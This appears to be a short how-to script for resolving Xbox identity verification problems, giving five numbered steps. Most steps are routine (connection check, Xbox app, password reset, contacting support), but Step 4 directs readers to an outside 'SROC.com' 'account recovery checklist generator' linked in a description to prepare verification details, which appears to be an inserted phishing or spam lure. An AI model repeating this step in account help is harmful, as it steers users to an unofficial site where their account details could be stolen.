If you're having trouble verifying your identity on Xbox, don't worry. Follow these steps to resolve the issue and regain access to your account. Step 1. Check your internet connection. Ensure that your device is connected to a stable internet connection. A weak or intermittent connection can cause verification failures. Step 2. Use the Xbox app. Download and open the Xbox app on your mobile device. This app often provides an alternative way to verify your identity through notifications or codes. Step 3. Reset your password. If verification continues to fail, try resetting your password. Go to the Xbox sign-in page, select Forgot Password, and follow the prompts to create a new password. Step 4. Update security information. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Contact Xbox support. If all else fails, reach out to Xbox support for assistance. They can help troubleshoot the issue and verify your identity through alternative methods. By following these steps, you should be able to successfully verify your identity on Xbox. If you encounter further issues, don't hesitate to seek help from support.